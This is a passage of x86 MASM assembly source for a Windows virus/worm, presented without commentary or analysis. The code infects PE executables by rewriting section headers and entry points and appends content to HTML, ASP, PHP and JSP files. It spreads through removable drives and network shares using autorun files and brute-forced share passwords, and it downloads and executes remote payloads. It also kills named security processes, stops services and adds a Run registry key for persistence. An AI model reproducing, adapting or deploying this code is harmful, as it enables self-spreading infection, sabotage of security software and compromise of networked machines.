WORD .IF dword ptr [edx] == ('PteG') && dword ptr [edx + 4 ] == ('Acor') && dword ptr [edx + 8 ] == ('erdd') && word ptr [edx + 12] == ('ss') && byte ptr [edx + 14] == 0 mov edx, [esi].FirstThunk add edx, [EBP+ OFFSET _dwImageBase] add edx, eax MOV eax, dword ptr [edx] MOV dword ptr [ebp + OFFSET _GetProcAddress], eax .ELSEIF dword ptr [edx] == ('daoL') && dword ptr [edx + 4 ] == ('rbiL') && dword ptr [edx + 8 ] == ('Ayra') && word ptr [edx + 12] == 0 mov edx, [esi].FirstThunk add edx, [EBP+ OFFSET _dwImageBase] add edx, eax MOV eax, dword ptr [edx] MOV dword ptr [ebp + OFFSET _LoadLibraryA], eax .ENDIF pop eax pop edx add edx, 4 add eax, 4 .ENDW .ENDIF add esi,sizeof IMAGE_IMPORT_DESCRIPTOR .ENDW .IF [ebp + _GetProcAddress] == 0 \|\| [ebp + _LoadLibraryA ] == 0 @@GOOUT: .IF [ebp + _dwOrgEntry] == 0 popad ret .ELSEIF lea eax, [ebp + @@orgAddress] add eax, 4 mov ebx, [ebp + _dwOrgEntry] add ebx, [ebp + _dwImageBase] sub ebx, eax mov dword ptr [ebp + @@orgAddress], ebx popad db 0e9h @@orgAddress: dd 0 .ENDIF .ENDIF lea eax, [ebp + szKernel32] push eax call [ebp + _LoadLibraryA] mov [ebp + _dwKernelBase], eax push eax pop ebx lea edx, [ebp + offset _GetModuleHandle] push edx lea edx, [ebp + offset szGetModuleHandle] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _FreeLibrary] push edx lea edx, [ebp + offset szFreeLibrary] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _VirtualProtect] push edx lea edx, [ebp + offset szVirtualProtect] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetModuleFileName] push edx lea edx, [ebp + offset szGetModuleFileName] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreateFile] push edx lea edx, [ebp + offset szCreateFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _ReadFile] push edx lea edx, [ebp + offset szReadFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _WriteFile] push edx lea edx, [ebp + offset szWriteFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetFileSize] push edx lea edx, [ebp + offset szGetFileSize] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CloseHandle] push edx lea edx, [ebp + offset szCloseHandle] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreateRemoteThread] push edx lea edx, [ebp + offset szCreateRemoteThread] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _VirtualAllocEx] push edx lea edx, [ebp + offset szVirtualAllocEx] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _VirtualFree] push edx lea edx, [ebp + offset szVirtualFree] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _WriteProcessMemory] push edx lea edx, [ebp + offset szWriteProcessMemory] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _OpenProcess] push edx lea edx, [ebp + offset szOpenProcess] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreateProcess] push edx lea edx, [ebp + offset szCreateProcess] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _TerminateProcess] push edx lea edx, [ebp + offset szTerminateProcess] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreateThread] push edx lea edx, [ebp + offset szCreateThread] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _Sleep] push edx lea edx, [ebp + offset szSleep] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _CreatePipe] push edx lea edx, [ebp + offset szCreatePipe] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GlobalAlloc] push edx lea edx, [ebp + offset szGlobalAlloc] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GlobalFree] push edx lea edx, [ebp + offset szGlobalFree] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _SetFilePointer] push edx lea edx, [ebp + offset szSetFilePointer] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _FindFirstFile] push edx lea edx, [ebp + offset szFindFirstFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _FindNextFile] push edx lea edx, [ebp + offset szFindNextFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _FindClose] push edx lea edx, [ebp + offset szFindClose] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _WinExec] push edx lea edx, [ebp + offset szWinExec] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetSystemDirectory] push edx lea edx, [ebp + offset szGetSystemDirectory] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetDriveType] push edx lea edx, [ebp + offset szGetDriveType] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _SetFileTime] push edx lea edx, [ebp + offset szSetFileTime] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _SetFileAttributes] push edx lea edx, [ebp + offset szSetFileAttributes] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetFileAttributesEx] push edx lea edx, [ebp + offset szGetFileAttributesEx] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _DeleteFile] push edx lea edx, [ebp + offset szDeleteFile] push edx sub esp, 8 call InitFunctionAddress lea edx, [ebp + offset _GetLastError] push edx lea edx, [ebp + offset szGetLastError] push edx sub esp, 8 call InitFunctionAddress ;-----------ntdll.dll-------------------- lea eax, [ebp + szNtdll] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _NtQuerySystemInformation] push edx lea edx, [ebp + offset szNtQuerySystemInformation] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;---------------Mpr.dll-------------------------- lea eax, [ebp + szMpr] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _WNetOpenEnum] push edx lea edx, [ebp + offset szWNetOpenEnum] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _WNetEnumResource] push edx lea edx, [ebp + offset szWNetEnumResource] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _WNetAddConnection2] push edx lea edx, [ebp + offset szWNetAddConnection2] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _WNetCloseEnum] push edx lea edx, [ebp + offset szWNetCloseEnum] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;-----------urlmon.dll------------------ lea eax, [ebp + szurlmon] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _URLDownloadToFile] push edx lea edx, [ebp + offset szURLDownloadToFile] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;----------------Advapi32.dll------------------ lea eax, [ebp + szAdvapi32] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _OpenSCManager] push edx lea edx, [ebp + offset szOpenSCManager] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _OpenService] push edx lea edx, [ebp + offset szOpenService] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _ControlService] push edx lea edx, [ebp + offset szControlService] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _CloseServiceHandle] push edx lea edx, [ebp + offset szCloseServiceHandle] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _RegOpenKeyEx] push edx lea edx, [ebp + offset szRegOpenKeyEx] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _RegSetValueEx] push edx lea edx, [ebp + offset szRegSetValueEx] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress lea edx, [ebp + offset _RegCloseKey] push edx lea edx, [ebp + offset szRegCloseKey] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;-----------user32.dll------------------ lea eax, [ebp + szUser32] push eax call [ebp + _LoadLibraryA] push eax pop ebx lea edx, [ebp + offset _FindWindowEx] push edx lea edx, [ebp + offset szFindWindowEx] push edx push [ebp + _GetProcAddress] push ebx call InitFunctionAddress ;---------------initialize end-------------------------- ;-----------remove begin---------- lea edx, [ebp + offset _mm] push edx lea edx, [ebp + offset szmm] push edx sub esp, 8 call InitFunctionAddress ;-----------HOOK API---------------------- ;---------------------------test fun ------------------ call specifyFun ;---------------------------end test fun------------------- ; ---------------remove begin ----------------------------------------------------------------------------- mov edx, offset check@@3 add edx, ebp jmp edx mes3 : db " finish!",0 check@@3: lea edx, [ebp + offset mes3] push [ebp + _mm] push edx call checkPoint ;-----------remove end------------- @@JMPOLDPROC: lea ebx, [ebp + @@GOOUT] jmp ebx ;---------------------------------------------------------------------------------------- InitFunctionAddress proc uses ebx edx , hMod : LPVOID, pGetProcAddress : LPVOID, lpFunName : LPVOID, lpAddress : DWORD mov ebx, lpAddress push lpFunName push hMod call pGetProcAddress mov dword ptr [ebx], eax ret InitFunctionAddress ENDP ;--------------------------------------------------------------------- specifyFun proc .if BYTE PTR [ebp+runPosition] call DownFileFromNet push 0 push 0 push ebp lea ebx, [ebp + LOOPCreateVirusExe] push ebx push 10241024 push 0 call [ebp+_CreateThread] .else push ebp call CreateVirusExe push 0 push 0 push ebp lea ebx, [ebp + LOOPInfectNetFile] push ebx push 10241024 push 0 call [ebp+_CreateThread] @@specifyFun_loop: call shortTimeSelfFun lea eax, [ebp + @@specifyFun_loop] jmp eax .endif ret specifyFun endp ;------------------------------------------------------------------------ LOOPCreateVirusExe PROC push ebp mov ebp, [esp + 8] @@LOOPCreateVirusExe: call InfectfileFun lea eax, [ebp + @@LOOPCreateVirusExe] jmp eax pop ebp ret 4 LOOPCreateVirusExe endp ;------------------------------- CreateVirusExe PROC push ebp mov ebp, [esp + 8] push ebx mov ebx, esp sub esp, 104H mov dword ptr [esp], '\' push ebx lea ebx, [esp + 8] push 100h push ebx call [ebp + _GetSystemDirectory] lea eax, [ebx - 4] push eax push ebx call strcat lea eax, [ebp + virname] push eax push ebx call strcat call CreateVirusExeAndWrite call CheckCurrentExist .if eax push 0 push ebx call [ebp + _WinExec] .if eax <= 31 push 80H push ebx call [ebp + _SetFileAttributes] push ebx call [ebp + _DeleteFile] call CreateVirusExeAndWrite push 0 push ebx call [ebp + _WinExec] .endif .endif pop esp pop ebx pop ebp ret 4 CreateVirusExe endp ;-------------------------------------- CreateVirusExeAndWrite proc push ebx push edx push esi push edi push ecx mov edx, esp mov ecx, offset ournasdfasdf - offset embedMain + 280H + 10H and cl, 0f0h sub esp, ecx mov edi, esp push edx push 0 push 80H push 1 push 0 push 0 push GENERIC_WRITE push ebx call [ebp + _CreateFile] .IF eax == -1 call [ebp + _GetLastError] lea eax, [@@CreateVirusExeAndWrite_out + ebp] jmp eax .ENDIF push eax push dword ptr [ebp + _dwImageBase] push dword ptr [ebp + _dwOrgEntry] push 0 lea ecx, [ebp + tempword] push ecx mov ecx, offset ournasdfasdf - offset embedMain add ecx, 278h push ecx lea esi, [ebp + ournasdfasdf] sub esi, ecx mov edx, ecx mov dword ptr [ebp + _dwImageBase], 400000h mov dword ptr [ebp + _dwOrgEntry], 0 and BYTE PTR [ebp + runPosition], 0 push edi push edi shr ecx, 2 rep movs dword ptr [edi], dword ptr [esi] pop edi push eax mov eax, edi add eax, edx mov ecx, offset ournasdfasdf - offset @@beginEnvelopPos sub eax, ecx call EnvelopCode call [ebp + _WriteFile] pop dword ptr [ebp + _dwOrgEntry] pop dword ptr [ebp + _dwImageBase] or BYTE PTR [ebp + runPosition], 1 call [ebp + _CloseHandle] mov eax, 0 @@CreateVirusExeAndWrite_out: pop esp pop ecx pop edi pop esi pop edx pop ebx ret CreateVirusExeAndWrite endp ;----------------------------------------------------------------------------- wirteautorun PROC push ebx push 80H push ebx call [ebp + _SetFileAttributes] push 0 push 80H push OPEN_ALWAYS push 0 push 0 push GENERIC_WRITE push ebx call [ebp + _CreateFile] .if eax == 0 pop ebx ret .endif push eax mov ebx, eax push 0 lea eax, [ebp + tempword] push eax push offset virdll - offset _autoruncontent - 1 lea eax, [ebp + _autoruncontent] push eax push ebx call [ebp + _WriteFile] call [ebp + _CloseHandle] pop ebx push FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_READONLY + FILE_ATTRIBUTE_ARCHIVE push ebx call [ebp + _SetFileAttributes] ret wirteautorun endp movabledisk Proc push ebx push ecx mov ecx, esp sub esp, 20H mov ebx, esp push ecx mov dword ptr [ebx], '\:y' mov cl, byte ptr [ebx] .while cl <= 'z' push ebx call [ebp + _GetDriveType] ;int 3 .if eax == DRIVE_REMOVABLE \|\| eax == DRIVE_REMOTE lea eax, [ebp + virname] push eax push ebx call strcat ;int 3 call CreateVirusExeAndWrite .if eax == 0 push FILE_ATTRIBUTE_READONLY + FILE_ATTRIBUTE_HIDDEN push ebx call [ebp + _SetFileAttributes] mov byte ptr [ebx + 3], 0 lea eax, [ebp + _autorun] push eax push ebx call strcat call wirteautorun .endif .endif inc byte ptr [ebx] mov cl, byte ptr [ebx] .endw pop esp pop ecx pop ebx ret movabledisk endp LOOPInfectNetFile PROC push ebp mov ebp, [esp + 8] @@LOOPInfectNetFile: call longTimeSelfFun lea eax, [ebp + @@LOOPInfectNetFile] jmp eax pop ebp ret 4 LOOPInfectNetFile endp ;------------------------------------- InfectNetFile proc push ebx push ecx mov ebx, esp sub esp, 32 mov ecx, esp push ebx mov ebx, ecx push ebx xor ecx,ecx mov cl, 8 .while cl mov dword ptr[ebx], 0 add ebx, 4 dec cl .endw pop ebx call EnumShareNet pop esp pop ecx pop ebx ret InfectNetFile endp ;------------------------------------ strupw proc desc:dword push edi mov edi, desc .while byte ptr [edi] .if byte ptr [edi] >= 'a' && byte ptr [edi] <= 'z' sub byte ptr [edi], 'a'-'A' .endif inc edi .endw pop edi ret strupw endp strchr proc desc:dword, chr : dword push edi mov edi, desc mov eax, chr .while byte ptr [edi] .if byte ptr [edi] == al mov eax, edi pop edi ret .endif inc edi .endw xor eax,eax pop edi ret strchr endp ;------------------------------------------------------ ;---------------------------------------------------------------- EnumShareNet PROC push ebx push edi push esi push ecx mov ecx, esp sub esp, 0ch mov edi, esp push ecx push edi push ebx push 0 push 0 push 2 call [ebp + _WNetOpenEnum] .if eax lea eax, [ebp + @@EnumShareNet_end] jmp eax .endif push 16384 push 40H call [ebp +_GlobalAlloc] .if eax == 0 lea eax, [ebp + @@EnumShareNet_end] jmp eax .endif mov esi, eax lea eax, [edi + 8] mov dword ptr [eax], 16384 push eax push esi lea eax, [edi + 4] push eax mov dword ptr [eax], -1; push dword ptr [edi] call [ebp + _WNetEnumResource] .if eax lea eax, [ebp + @@EnumShareNet_end] jmp eax .endif mov ecx, dword ptr [edi + 4] push esi .while ecx assume esi : ptr NETRESOURCEA ;int 3 push ecx mov ebx, [esi].lpRemoteName mov eax, 1 call dealNetAllFile .if eax mov eax, [esi].dwUsage .if ebx && (eax & 1) \|\| (eax & 2) mov ebx, esi ;int 3 call EnumShareNet .endif .endif add esi, 32 pop ecx dec ecx .endw call [ebp + _GlobalFree] push dword ptr [edi] call [ebp + _WNetCloseEnum] @@EnumShareNet_end: pop esp pop ecx pop esi pop edi pop ebx ret EnumShareNet ENDP ;----------------------------------------------------------------- InfectFile proc push ebp mov ebp, dword ptr [esp + 8] push ebx push ecx sub esp, 4 mov ebx, esp mov dword ptr [ebx], '\:y' .while BYTE PTR [ebx] <= 'z' mov cl, 10H call InfectAllFile inc BYTE PTR [ebx] .endw add esp, 4 pop ecx pop ebx pop ebp ret 4 InfectFile endp strcat proc desc:dword, src:dword push edi mov edi, desc .while BYTE PTR [edi] inc edi .endw push src push edi call strcpy pop edi ret strcat endp strcpy proc desc:DWORD, src:DWORD push esi push edi mov esi, src mov edi, desc .while BYTE PTR [esi] mov al, BYTE PTR [esi] mov BYTE PTR [edi], al inc edi inc esi .endw mov BYTE PTR [edi], 0 pop edi pop esi ret strcpy ENDP ;------------------------------------------------------------------- TryNetPassword PROC push ebx mov ebx, esp push edi push ecx push edx sub esp, 20H mov eax, esp push ebx mov ebx, dword ptr [ebx + 8] push eax mov cl, 20H .while cl mov byte ptr [eax], 0 inc eax dec cl .endw pop edi mov dword ptr [edi + 14H], ebx mov al, 1 lea ebx, [ebp + _tryUserName] .while eax && byte ptr [ebx] lea edx, [ebp + _tryPassword] .while eax && byte ptr [edx] push 1 push ebx push edx push edi int 3 call [ebp + _WNetAddConnection2] .while eax && byte ptr [edx] inc edx .endw inc edx .endw .while eax && byte ptr [ebx] inc ebx .endw inc ebx .endw pop esp pop edx pop ecx pop edi pop ebx ret TryNetPassword ENDP ;------------------------------------------------------------------ ;------------------------------------------------------------------- dealNetAllFile PROC push ebx push edi mov edi, esp sub esp, 204H push edi sub edi, 204H ;-------------messagebox---------------- ;int 3 ;-------------------------------------- mov dword ptr [edi], '\'; .if ebx && word ptr [ebx] == '\\' push ebx lea ebx, [edi + 4] push ebx call strcpy push edi push ebx call strcat push ebx lea ebx, [edi + 104H] push ebx call strcpy lea ebx, [ebp + offset virname] push ebx lea ebx, [edi + 4] push ebx call strcat .if dword ptr [ebx] == 'LB\\' ;int 3 call CreateVirusExeAndWrite .if eax lea eax, [edi + 104H] push eax call TryNetPassword call CreateVirusExeAndWrite .endif push eax .if eax == 0 lea ebx, [edi + 104H] push ebx lea ebx, [edi + 4] push ebx call strcpy lea eax, [ebp + _autorun] push eax push ebx call strcat call wirteautorun .endif lea ebx, [edi + 104H] call InfectAllFile pop eax .endif .endif pop esp pop edi pop ebx ret dealNetAllFile ENDP ;------------------------------------------------------------------ InfectAllFile PROC uses ebx edi ;LOCAL path[100h] : BYTE ;LOCAL fileData[300] : BYTE ;LOCAL hFind : DWORD ;LOCAL ext : DWORD ;LOCAL SPIT : WORD ; push 500 ; call [ebp + _Sleep] push esi mov esi, ebp mov ebp, esp sub esp, 100h+300+10h mov dword ptr [ebp - 100h - 300 - 4 - 4] , '.' mov word ptr [ebp - 100h - 300 - 4 - 4 - 2] , '\' lea edi, [ebp - 100h] push ebx push edi call strcpy .if ecx lea edx, [ebp - 100h - 300 - 4 - 4] push edx push edi call strcat lea edx, [ebp - 100h - 300] push edx push edi call [esi + _FindFirstFile] .if eax == -1 lea eax, [esi + @@InfectAllFile_end] jmp eax .endif mov [ebp - 100h - 300 - 4] , eax @@InfectAllFile_FindNextFile: push ebx lea edx, [ebp - 100h - 300] assume edx : ptr WIN32_FIND_DATA mov ecx, [edx].dwFileAttributes lea ebx, [edx].cFileName and ecx, 10H .IF BYTE PTR [ebx] == '.' lea eax, [esi + @@FindFileskip_next] jmp eax .ENDIF .if ecx lea eax, [ebp - 100h - 300 - 4 - 4 - 2] push eax push ebx call strcat .else push ebx call strupw .endif push ebx push edi call strcat mov ebx, edi push ebp mov ebp, esi call InfectAllFile pop ebp @@FindFileskip_next: lea edx, [ebp - 100h - 300] push edx push [ebp - 100h - 300 - 4] call [esi + _FindNextFile] pop ebx .if eax push ebx push edi call strcpy lea eax, [esi + @@InfectAllFile_FindNextFile] jmp eax .endif push [ebp - 100h - 300 - 4] call [esi + _FindClose] .else push ebp mov ebp, esi call InfectOneFile pop ebp .endif @@InfectAllFile_end: mov esp, ebp mov ebp, esi pop esi ret InfectAllFile ENDP InfectOneFile PROC uses esi ecx edi ;ebx---文件名的地址 push ebp push ebx mov esi, ebp mov ebp, esp mov ecx, offset ournasdfasdf - offset embedMain + 280H + 10H + 10H + 30H and cl, 0f0h sub esp , ecx ;int 3 push 0 push 80H push 3 push 0 push 0 push GENERIC_READ + GENERIC_WRITE push ebx mov dword ptr[ebp - 8], 0 push '.' push ebx call strchr .if eax && dword ptr [eax + 1] == 'MTH' \|\| dword ptr [eax + 1] == 'PSA' \|\| \ dword ptr [eax + 1] == 'LMTH' \|\| dword ptr [eax + 1] == 'PSJ' \|\| \ dword ptr [eax + 1] == 'PHP' mov dword ptr[ebp - 8], 1 .endif lea eax, [ebp - 40H] push eax push 0 push ebx call [esi + _GetFileAttributesEx] call [esi + _CreateFile] .IF eax == -1 call [esi + _GetLastError] lea eax, [@@InfectOneFile_Out + esi] jmp eax .ENDIF mov ebx, eax .if dword ptr[ebp - 8] == 1 push FILE_END push 0 push offset _website - offset _website_end push ebx call [esi + _SetFilePointer] push ecx push edi push edx mov ecx, offset _website_end - offset _website mov edx, esp sub esp, ecx sub esp, 10H and sp, 0fffcH mov edi, esp push edx push 0 lea eax, [esi + tempword] push eax push ecx push edi push ebx call [esi + _ReadFile] lea edx, [esi + _website] mov ecx, offset _website_end - offset _website .while ecx mov al, byte ptr [edx] .if byte ptr [edi] != al mov eax, -1 mov ecx, 1 .endif inc edi inc edx dec ecx .endw pop esp pop edx pop edi pop ecx .if eax != -1 lea eax, [esi + @@closeInfectOneFile] jmp eax .endif push 0 lea ecx, [ebp - 4] push ecx push offset _website_end - offset _website lea edi, [esi + _website] push edi push ebx call [esi + _WriteFile] lea eax, [esi + @@closeInfectOneFile] jmp eax .endif push 0 lea ecx, [ebp - 4] push ecx push offset ournasdfasdf - offset embedMain + 278H mov edi, ebp sub edi, offset ournasdfasdf - offset embedMain + 278H + 10H + 30H push edi push ebx call [esi + _ReadFile] .IF eax != 0 && word ptr [edi] == 'ZM' && dword ptr[edi + 03ch] < 1000H mov ecx, dword ptr[edi + 03ch] add ecx, edi .IF word ptr [ecx] != 'EP' \|\| dword ptr [ecx + 78H] \|\| dword ptr [ecx + 7cH] lea eax, [esi + @@closeInfectOneFile] jmp eax .ENDIF push edi push ebx xor eax, eax mov dx, word ptr [ecx + 6] dec dx mov ax, 28h mul dx push ecx lea edx, [esi + ournasdfasdf] lea ecx, [esi + embedMain] sub edx, ecx add edx, 278h pop ecx add eax, 0F8h add eax, ecx mov ebx, dword ptr [eax + 14H] mov dword ptr [ebp - 0ch], ebx mov ebx, dword ptr [eax + 10H] add dword ptr [ebp - 0ch], ebx push ebx add dword ptr [eax + 10H], edx mov ebx, dword ptr [eax + 10H] mov dword ptr [eax + 8], ebx mov ebx, dword ptr [eax + 0ch] mov dword ptr[ecx + 50h], ebx mov ebx, dword ptr [eax + 8] add dword ptr[ecx + 50h], ebx pop ebx .IF dword ptr [eax + 24h] & 0e0000020h pop ebx pop edi lea eax, [esi + @@closeInfectOneFile] jmp eax .ENDIF or dword ptr [eax + 24h], 0e0000020h mov eax, dword ptr [eax + 0ch] add eax, ebx add eax, 278h mov ebx, dword ptr[ecx + 28H] ; write to addressOfEntryProint mov dword ptr[ecx + 28H], eax mov eax, dword ptr [ecx + 34H] ;---- eax : ImageBase ebx : AddressOfEntryPoint edx : virus length mov ecx, ebx pop ebx pop edi push edx ; virus length push ecx ; AddressOfEntryPoint push eax ; ImageBase mov dword ptr[ebp - 8], 0 push 0 push 0 push 0 push ebx call [esi + _SetFilePointer] push 0 lea ecx, [ebp - 4] push ecx push dword ptr [ecx] push edi push ebx call [esi + _WriteFile] mov dword ptr[ebp - 8], 0 push 0 push 0 push dword ptr [ebp - 0ch] push ebx call [esi + _SetFilePointer] mov eax, dword ptr [esi + _dwImageBase] mov ecx, dword ptr [esi + _dwOrgEntry] pop dword ptr [esi + _dwImageBase] pop dword ptr [esi + _dwOrgEntry] pop edx ; virus length or BYTE PTR [esi+runPosition], 1 push eax push ecx push esi push edi add esi, offset ournasdfasdf sub esi, edx mov eax, edi mov ecx, edx shr ecx, 2 rep movs dword ptr [edi], dword ptr [esi] add eax, edx mov ecx, offset ournasdfasdf - offset @@beginEnvelopPos sub eax, ecx call EnvelopCode pop edi pop esi push 0 lea ecx, [ebp - 4] push ecx push edx push edi push ebx call [esi + _WriteFile] pop dword ptr [esi + _dwOrgEntry] pop dword ptr [esi + _dwImageBase] and BYTE PTR [esi+runPosition], 0 .ENDIF @@closeInfectOneFile: lea eax, [ebp - 40H + 14H] push eax lea eax, [ebp - 40H + 0cH] push eax lea eax, [ebp - 40H + 4H] push eax push ebx call [esi + _SetFileTime] push ebx call [esi + _CloseHandle]; mov eax, 0 @@InfectOneFile_Out: mov esp, ebp pop ebx pop ebp ret InfectOneFile ENDP ;---------------------------------------------------- stricmp Proc desc : dword , wsrc: dword push esi push edi mov edi, desc mov esi, wsrc mov al, byte ptr [esi] .while al && byte ptr [edi] mov al, byte ptr [esi] .if al != byte ptr [edi] sub al, 'a' - 'A'; .if al != byte ptr [edi] add al, 2 * ('a' - 'A'); .if al != byte ptr [edi] xor al, al .endif .endif .endif .if al inc esi inc esi inc edi .endif .endw .if byte ptr [esi] && byte ptr [edi] mov al, 1 .else xor eax, eax .endif pop edi pop esi ret stricmp endp ;---------------------------------------------- dealProcess proc push edi mov cl, 1 mov ebx, edi push 1 int 3 .while ecx ;------------------------2 mov ecx, dword ptr [ebx] mov edi, ebx add edi, 03ch xor eax, eax .if dword ptr [edi] ;--------------------3 push dword ptr [edi] lea edx, [ebp + offset virname] push edx call stricmp .if eax == 0 ;-----------4 pop eax push 0 .else ;start kill software lea edx, [ebp + _killSoftName] .while byte ptr [edx] ;---1 push dword ptr [edi] push edx call stricmp push edx .if eax == 0 int 3 push ecx push dword ptr [ebx + 44H] push 0 push PROCESS_ALL_ACCESS + PROCESS_TERMINATE call [ebp + _OpenProcess] .if eax push eax push 0 push eax call [ebp + _TerminateProcess] call [ebp + _CloseHandle] .endif pop ecx .endif pop edx .while byte ptr [edx] inc edx .endw inc edx .endw ;-----1 .endif ;--------------4 .endif ;--------------------3 add ebx, ecx .endw ;----------2 pop eax pop edi ret dealProcess endp ;------------------------------------------------ CheckCurrentExist Proc ; 0 存在 1 不存在 push ebx push edx push edi push ecx mov ecx, 2000H mov edi, esp sub esp, 10H mov ebx, esp push edi @@CheckCurrentExist_retry: push ecx push ecx push ecx push 40H call [ebp +_GlobalAlloc] mov edi, eax .if eax == 0 pop eax lea eax, [ebp + @@CheckCurrentExist_out] jmp eax .endif pop ecx push ebx push ecx push edi push 5 call [ebp + _NtQuerySystemInformation] int 3 .if eax == 0c0000004H push edi call [ebp + _GlobalFree] pop ecx add ecx, 1000H lea eax, [ebp + @@CheckCurrentExist_retry] jmp eax .endif .if eax == 0 call dealProcess .endif @@CheckCurrentExist_out: .if edi push eax push edi call [ebp + _GlobalFree] pop eax .endif pop ecx pop esp pop ecx pop edi pop edx pop ebx ret CheckCurrentExist endp ;---------------------------------------- DownFileFromNet proc push ebx push edi mov ebx, esp sub esp, 1010H mov edi, esp push ebx lea ebx, [ebp + _downFileList] mov al, 1 .while eax && byte ptr [ebx] mov dword ptr [edi], 'n\:c' mov dword ptr [edi + 4], 'ld.' push 0 push 0 push edi push ebx push 0 call [ebp + _URLDownloadToFile] .if eax .while byte ptr [ebx] inc ebx .endw inc ebx .else push edi mov eax, edi push 0 push 80H push 3 push 0 push 0 push GENERIC_READ push eax call [ebp + _CreateFile] .if eax != -1 add edi, 10H push eax push 0 lea eax, [esi + tempword] push eax push ecx push edi push ebx call [esi + _ReadFile] call [esi + _CloseHandle] .while byte ptr [edx] mov eax, edx .while byte ptr [edx] inc edx .endw inc edx .if byte ptr [edx] push 0 push 0 push edx push eax push 0 call [ebp + _URLDownloadToFile] .if eax push 0 push edx call [ebp + _WinExec] .endif .while byte ptr [edx] inc edx .endw inc edx .endif .endw .endif call [ebp + _DeleteFile] xor eax, eax .endif .endw pop esp pop edi pop ebx ret DownFileFromNet endp ;---------------------------------------- StopServiceAndWriteRun proc push ebx push edx mov edx, esp sub esp, 20H mov ebx, esp push edx push ebx push KEY_SET_VALUE + KEY_WRITE push 0 lea edx, [ebp + _runKey] push edx push 80000002H call [ebp + _RegOpenKeyEx] .if eax push offset virdll - offset virname lea edx, [ebp + virname] push edx push 1 push 0 lea edx, [ebp + _runKeyName] push edx push dword ptr [ebx] call [ebp + _RegSetValueEx] push dword ptr [ebx] call [ebp + _RegCloseKey] .endif push SC_MANAGER_ALL_ACCESS push 0 push 0 call [ebp + _OpenSCManager] .if eax push eax mov dword ptr [ebx], eax lea edx, [ebp + _StopServiceName] .while byte ptr [edx] push edx push SERVICE_ALL_ACCESS + SERVICE_STOP push edx push dword ptr [ebx] call [ebp + _OpenService] .if eax push eax lea edx, [ebx + 4] push edx push 1 push eax call [ebp + _ControlService] call [ebp + _CloseServiceHandle] .endif pop edx .while byte ptr [edx] inc edx .endw inc edx .endw call [ebp + _CloseServiceHandle] .endif pop esp pop edx pop ebx ret StopServiceAndWriteRun endp ;---------------自身进程--------------------------- shortTimeSelfFun proc call StopServiceAndWriteRun call movabledisk push 1000 * 60 call [ebp + _Sleep] ret shortTimeSelfFun endp ;----------------自身启的线程----------- longTimeSelfFun proc call InfectNetFile call DownFileFromNet push ebp call InfectFile push 24 * 60 * 60 * 1000 call [ebp + _Sleep] ret longTimeSelfFun endp ;------------后启的线程------------------ InfectfileFun proc push ebp call CreateVirusExe push 2 * 60 * 1000 call [ebp + _Sleep] ret InfectfileFun endp ;----------------------------------------------------------------- ;------------------remove--begin------------------- checkPoint proc uses edx, lpAddr : DWORD, funAddress : DWORD push 0 push 0 push lpAddr push 0 call funAddress ret checkPoint endp ;----------------remove end----------------- ;-----------file head paramter--------- _dwImageBase dd 400000h _dwOrgEntry dd 0 _dwKernelBase dd 0 ;-----------Kernel fun address---------------- _GetProcAddress dd 0 _LoadLibraryA dd 0 szKernel32 db "Kernel32.dll",0 szGetModuleHandle db "GetModuleHandleA",0 _GetModuleHandle dd 0 